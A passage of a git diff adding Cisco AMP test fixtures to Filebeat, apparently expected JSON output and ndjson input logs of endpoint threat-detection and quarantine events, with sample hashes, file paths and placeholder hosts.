"\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 47266, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258118058508361", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 636000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258118058508000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": 
"Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 48591, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533667837389570068", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 689000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667837389570000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 49910, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + 
"b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:41.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258066518900808", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 608000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258066518901000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 51229, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + 
}, + { + "@timestamp": "2021-01-15T10:13:29.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176258014979293255", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 581000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176258014979293000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 52548, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:13:17.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + 
"mac": "23:d5:92:eb:f8:9b" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "GenericKD:Dyreza-tpd", + "cisco.amp.detection_id": "6176257963439685702", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "23:d5:92:eb:f8:9b" + ], + "cisco.amp.timestamp_nanoseconds": 569000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6176257963439686000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "e9d8c15e7d18678dd41771f72ed6693c", + "file.hash.sha1": "ec80314ae4a2817be806b7ae27dbdb31a88226a0", + "file.hash.sha256": "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "file.name": "webinstall.exe", + "file.path": "C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Dyre", + "host.name": "Demo_Dyre", + "input.type": "log", + "log.offset": 53867, + "related.hash": [ + "4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc", + "e9d8c15e7d18678dd41771f72ed6693c", + "ec80314ae4a2817be806b7ae27dbdb31a88226a0" + ], + "related.hosts": [ + "Demo_Dyre" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:12:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.File.MalParent", + "cisco.amp.detection_id": "6533667579691532307", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + 
"cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 778000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667579691532000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 55186, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:12:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6533667579691532306", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + 
"cisco.amp.timestamp_nanoseconds": 747000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533667579691532000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 56512, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-15T10:12:53.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "63:5f:47:2b:89:91" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.DFC.MalParent", + "cisco.amp.detection_id": "6533667579691532305", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "63:5f:47:2b:89:91" + ], + "cisco.amp.timestamp_nanoseconds": 371000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 
6533667579691532000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "b99e0a8c56f963246b6464b9fffbf7a2", + "file.hash.sha1": "b024546a49bad1bd60fccef0a5d11b55f9a442c4", + "file.hash.sha256": "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "file.name": "ekjrngjker.exe", + "file.path": "\\\\?\\C:\\ekjrngjker.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Audit", + "host.name": "Demo_AMP_Threat_Audit", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 57830, + "related.hash": [ + "b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967", + "b99e0a8c56f963246b6464b9fffbf7a2", + "b024546a49bad1bd60fccef0a5d11b55f9a442c4" + ], + "related.hosts": [ + "Demo_AMP_Threat_Audit" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + } +] \ No newline at end of file diff --git a/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log b/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log new file mode 100644 index 000000000000..f31bf18a23a1 --- /dev/null +++ b/x-pack/filebeat/module/cisco/amp/test/cisco_amp4.ndjson.log 
@@ -0,0 +1,100 @@ +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6508397899087348000,"timestamp":1610659036,"timestamp_nanoseconds":295927133,"date":"2021-01-14T21:17:16+00:00","event_type":"Retrospective Detection","event_type_id":553648147,"detection":"W32.6A37D750F0-100.SBX.TG","detection_id":"6508397899087347713","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"38:1e:eb:ba:2c:15"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"resume.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\Desktop\\resume.exe","identity":{"sha256":"6a37d750f02de99767770a2d1274c3a4e0259e98d38bd8a801949ae3972eef86","sha1":"5ca4bef8de6def53519d4b22632675bb4c1e470b","md5":"41476df3138717868118d8542cf3d1d6"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":14930696955218,"timestamp":1610656706,"timestamp_nanoseconds":844899579,"date":"2021-01-14T20:38:26+00:00","event_type":"Executed 
malware","event_type_id":1107296272,"detection":"W32.E4FCCBFA69-95.SBX.TG","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"High","start_timestamp":1610656706,"start_date":"2021-01-14T20:38:26+00:00","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225524,"description":"Object name not 
found"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Quarantine Failure","event_type_id":2164260880,"detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","error":{"error_code":3221225558,"description":"Delete pending"},"computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} 
+{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626319","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":7120,"disposition":"Malicious","file_name":"QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":572000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"QuotaGroup.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\QuotaGroup\\QuotaGroup.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626317","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"},"parent":{"process_id":4788,"disposition":"Malicious","file_name":"28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":478000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.E4FCCBFA69-95.SBX.TG","detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"28242311.exe","file_path":"\\\\?\\C:\\Users\\johndoe\\AppData\\Local\\Temp\\28242311.exe","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014","sha1":"f504774b72acfb23a46217aec9c6559fd7e4df64","md5":"b5ede95ec8bc4ad6984758be42b152bd"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":587000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat 
Quarantined","event_type_id":553648143,"detection_id":"6412680266518626318","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500","prev":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=0"},"results":{"total":972,"current_item_count":472,"index":500,"items_per_page":500}},"data":{"id":6412680266518626000,"timestamp":1610655485,"timestamp_nanoseconds":494000000,"date":"2021-01-14T20:18:05+00:00","event_type":"Threat Quarantined","event_type_id":553648143,"detection_id":"6412680266518626316","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Qakbot_3","external_ip":"8.8.8.8","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"02:2f:e0:10:03:5d"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","identity":{"sha256":"e4fccbfa69222c71130a307956df1dd3013ecb1b523e145fab7abf1602330014"}}}} 
